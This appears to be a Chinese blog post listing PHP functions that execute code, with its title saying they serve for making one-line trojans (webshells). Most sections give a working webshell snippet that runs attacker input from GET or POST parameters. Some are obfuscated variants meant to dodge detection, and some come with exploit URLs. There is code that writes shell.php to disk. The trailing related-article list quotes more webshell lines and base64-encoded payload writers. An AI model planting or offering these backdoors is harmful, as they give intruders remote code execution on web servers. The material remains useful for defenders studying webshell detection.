PHP代码执行函数总结(可以用于制作一句话木马)

最新推荐文章于 2024-03-16 18:00:00 发布
最新推荐文章于 2024-03-16 18:00:00 发布
阅读量9.9k 收藏 18
点赞数 2
分类专栏: 经验心得

PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。

  常见代码执行函数,如  

 

    eval()、assert()、preg_replace()、create_function()

    array_map()、call_user_func()、call_user_func_array(),array_filter,usort,uasort()

    文件操作函数、动态函数($a($b))

 

1、eval() 

  eval() 函数把字符串按照 PHP 代码来计算,如常见的一句话后门程序:<?php eval($_POST[cmd])?>

2、assert()

   与eval类似,字符串被 assert() 当做 PHP 代码来执行,如:

示例代码:

<?php 
//?cmd=phpinfo()
assert($_REQUEST[cmd]); 
?>

3、preg_replace()       (php5.5以后的版本废除了/e)

  mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

  搜索subject中匹配pattern的部分, 以replacement进行替换。

  preg_replace()函数原本是执行一个正则表达式的搜索和替换,但因为存在危险的/e修饰符,使 preg_replace() 将 replacement 参数当作 PHP 代码

<?php 
//?cmd=phpinfo()
@preg_replace("/abc/e",$_REQUEST['cmd'],"abcd");
?>

4、create_function()

  create_function主要用来创建匿名函数,如果没有严格对参数传递进行过滤,攻击者可以构造特殊字符串传递给create_function()执行任意命令。

代码示例:

<?php 
//?cmd=phpinfo();
$func =create_function('',$_REQUEST['cmd']);
$func();
?>

参考链接:

代码安全:PHP create_function()注入命令执行漏洞

http://www.cnseay.com/1901/

http://lovexm.blog.51cto.com/3567383/1743442

http://qqhack8.blog.163.com/blog/static/11414798520153795157139/

5、array_map()

  array_map() 函数将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。 回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。

 代码示例:

<?php
//?func=system&cmd=whoami
$func=$_GET['func'];
$cmd=$_GET['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
//print_r($new_array);
?>

6、call_user_func()/call_user_func_array ()

 

call_user_func — 把第一个参数作为回调函数调用,其余参数是回调函数的参数。

call_user_func_array — 调用回调函数,并把一个数组参数作为回调函数的参数

<?php 
//?cmd=phpinfo()
@call_user_func(assert,$_GET['cmd']);
?>

<?php 
//?cmd=phpinfo()
$cmd=$_GET['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
?>

7、array_filter()

 

rray array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )

  依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。

 

<?php 
//?func=system&cmd=whoami
$cmd=$_GET['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
?>

 

8、usort()、uasort()

  usort() 通过用户自定义的比较函数对数组进行排序。

  uasort() 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联 。

 

php环境>=5.6才能用
<?php usort(...$_GET);?>
利用方式:
test.php?1[]=1-1&1[]=eval($_POST['x'])&2=assert
[POST]:x=phpinfo();

php环境>=<5.6才能用
<?php usort($_GET,'asse'.'rt');?>
利用方式:
test.php?1=1+1&2=eval($_POST[x])
[POST]:x=phpinfo();

9、文件操作函数

  file_put_contents() 函数把一个字符串写入文件中。

  fputs() 函数写入文件

代码示例:

 

<?php 
$test='<?php eval($_POST[cmd]);?>';
file_put_contents('test1.php',$test);
?>
<?php 
fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>'); 
?>

10、动态函数

  PHP函数直接由字符串拼接

<?php 
//?a=assert&b=phpinfo()
$_GET['a']($_GET['b']);
?>

 

大方子
关注
  • 2
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
Windows和Linux下写入一句话PHP木马echo命令总结
weixin_40650190的博客
04-16 1万+
1.Windows: echo ^<?php @eval($_POST['x']); ?^> >shell.php 知识点:^以转义字符的身份出现。因为在cmd环境中,有些字符具备特殊功能,如>、>>表示重定向,|表示管道,&、&&、||表示语句连接……它们都有特定的功度能,如果需要把它们作为字符输出知的话,echo >、ec...
php mysql 注入一句话木马_PHP与SQL语句写一句话木马总结
weixin_30290673的博客
01-28 405
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:二、编码的替换的类型://会生成@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));//php在html内部的一种嵌入方式session_start();$...
渗透干货|史上最全一句话木马
2201_75362610的博客
03-16 940
/可执行命令一句话密码-7ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp原来代码是 把标签修改替换下来 为execute request(“cmd”) 这样就避开了符号!表中数据段限制,一句话木马也写不下的情况网络中流传的最小的木马代码是 如过连这也写不下怎么办?
php一句话怎么写_php最新变异一句话
weixin_32185607的博客
03-08 119
注释:站长的任务又加重了,好好认识下,以后见了好清除本来匿名发在土司上,现在应该传出去了,两个是来自国外的http://h.ackack.net/tiny-php-shell.htmlhttp://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/具体看国外的文章吧第一种:1.php=($_=@$_GET[2]).@$_($_...
php一句话 file_put_contents,PHP file_put_contents() 函数用法及示例
weixin_32386693的博客
03-22 694
PHP file_put_contents() 函数用法及示例file_put_contents()函数可以将字符串写入文件。语法intfile_put_contents(string$filename,mixed$data[,int$flags=0[,resource$context]])该函数访问文件时,遵循以下规则:如果设置了 FILE_USE_INCLUD...
<?php eval($_post[cmd]);?>,php eval函数用法及相关技巧
weixin_42813171的博客
03-18 3716
eval函数可将字符串之中的变量值代入,通常用在处理数据库的数据上。eval将值代入字符串之中。语法: void eval(string code_str);传回值: 无函式种类: 数据处理本函式可将字符串之中的变量值代入,通常用在处理数据库的数据上。参数 code_str 为欲处理的字符串。值得注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要有分号。使用本函式处理后的字符串会沿...
PHP代码执行函数总结
11-15 841
&#13;   PHP中可以执行代码函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。&#13;   常见代码执行函数,如  &#13;     eval()、assert()、preg_replace()、create_function()&#13;     array_map()、call_user_func()、call_user_fun...
php中fputs写入一句话,PHP fputs( )用法及代码示例
weixin_39544333的博客
03-11 569
PHP中的fputs()函数是一个内置函数用于写入打开的文件。fputs()函数在文件末尾或达到指定长度(作为参数传递)时停止,以先到者为准。文件,字符串和必须写入的长度作为参数发送到fputs()函数,它返回成功时写入的字节数,失败时返回FALSE。fputs()函数是fwrite()函数的别名。用法:fputs(file, string, length)使用的参数:PHP中的fputs()函...
PHP注入01】PHP语言常见可注入函数(eval、assert、preg_replace、call_user_func、$a($b)等)
Fighting_hawk的博客
02-26 3782
1. 掌握PHP语言种几种可能存在注入的函数; 2. 结合SQL注入与XSS漏洞思考PHP注入绕过手法。
PHP一句话木马
热门推荐
bolinmengling的博客
02-27 2万+
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过P​OST是传入的参数,此处使用的...
PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
百彦子烨的博客
11-10 1万+
该文章对PHP一句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
一句话 asp木马加密版 彻底突破杀毒软件
01-02
看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N=”)” Do While ...
ASP下检测图片木马的函数代码
01-02
木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的 ASP代码插在图片编码之后,虽然图片仍然可以正常显示,但是文件内容和尺寸已被改变)...
探索基于.NET下实现一句话木马之asmx篇1
08-03
云影实验室探索基于.NET 下实现一句话木马之 asmx 篇Ivan@360 云影实验室2018 年 07 月 18 日云影实验室0x01 前言上篇介绍了一般处
springboot(酒店管理系统)
04-25
开发语言:Java JDK版本:JDK1.8(或11) 服务器:tomcat 数据库:mysql 5.6/5.7(或8.0) 数据库工具:Navicat 开发软件:idea 依赖管理包:Maven 代码+数据库保证完整可用,可提供远程调试并指导运行服务(额外付费)~ 如果对系统的中的某些部分感到不合适可提供修改服务,比如题目、界面、功能等等... 声明: 1.项目已经调试过,完美运行 2.需要远程帮忙部署项目,需要额外付费 3.本项目有演示视频,如果需要观看,请联系我 4.调试过程中可帮忙安装IDEA,eclipse,MySQL,JDK,Tomcat等软件 重点: 需要其他Java源码联系我,更多源码任你选,你想要的源码我都有! 需要加v19306446185
BP神经网络matlab实例.doc
最新发布
04-25
数学模型算法
设计.zip
04-25
设计.zip
一句话木马图片转换成php
01-28
一句话木马图片转换成php是指将一个包含恶意代码的图片文件(一句话木马)转换为可执行php代码。这种操作通常是为了绕过一些安全策略,将恶意代码注入到目标系统中,从而实施各种攻击,如窃取用户信息、篡改网页内容等。 将一句话木马图片转换成php的步骤如下: 1. 首先,需要将图片文件上传到目标服务器。上传方式可以通过网页表单上传,或者利用其他漏洞实现远程文件包含等方式。 2. 接下来,需要对上传的图片进行解析,获取其中的恶意代码。这可以通过读取图片文件的二进制数据,并提取其中特定的标志来完成。 3. 一旦获取到恶意代码,就可以将其转换成可以执行php代码。这个过程可能涉及到解码、解压缩等操作,以还原原始的php代码。 4. 最后,将得到的php代码执行,就可以实现一句话木马的功能。攻击者可以通过发送特定的请求,触发木马代码执行,从而控制目标系统。 需要注意的是,上述操作是非法的,且具有很高的风险。一句话木马图片转换成php是黑客攻击的手段之一,目的是为了非法入侵、侵犯他人的隐私、窃取敏感信息等。因此,我们强烈建议遵守法律法规,不要参与任何形式的黑客活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值